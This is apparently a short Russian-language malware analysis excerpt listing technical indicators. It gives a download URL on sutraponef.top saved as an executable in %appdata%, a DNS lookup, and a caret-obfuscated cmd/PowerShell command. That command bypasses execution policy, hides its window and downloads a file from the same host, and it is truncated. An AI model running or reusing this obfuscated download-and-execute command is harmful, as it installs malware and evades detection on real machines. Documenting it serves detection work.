Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^wershe^ll.eXE^ -^e^Xe^cUTI^oN^POLiCy ^b^Yp^Ass -n^oPROf^IL^E ^-WiND^o^WS^t^YLe hI^ddE^N (ne^w-O^bjE^c^T SyST^em.^NE^t^.w^e^bC^lIeNT).d^OWnLO^A^dFIL^e('http://sutraponef.top/r...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "po^wershe^ll.eXE^ -^e^Xe^cUTI^oN^POLiCy ^b^Yp^Ass -n^oPROf^IL^E ^-WiND^o^WS^t^YLe hI^ddE^N (ne^w-O^bjE^c^T SyST^em.^NE^t^.w^e^bC^lIeNT).d^OWnLO^A^dFIL^e('http://sutraponef.top/r...' (со скрытым окном)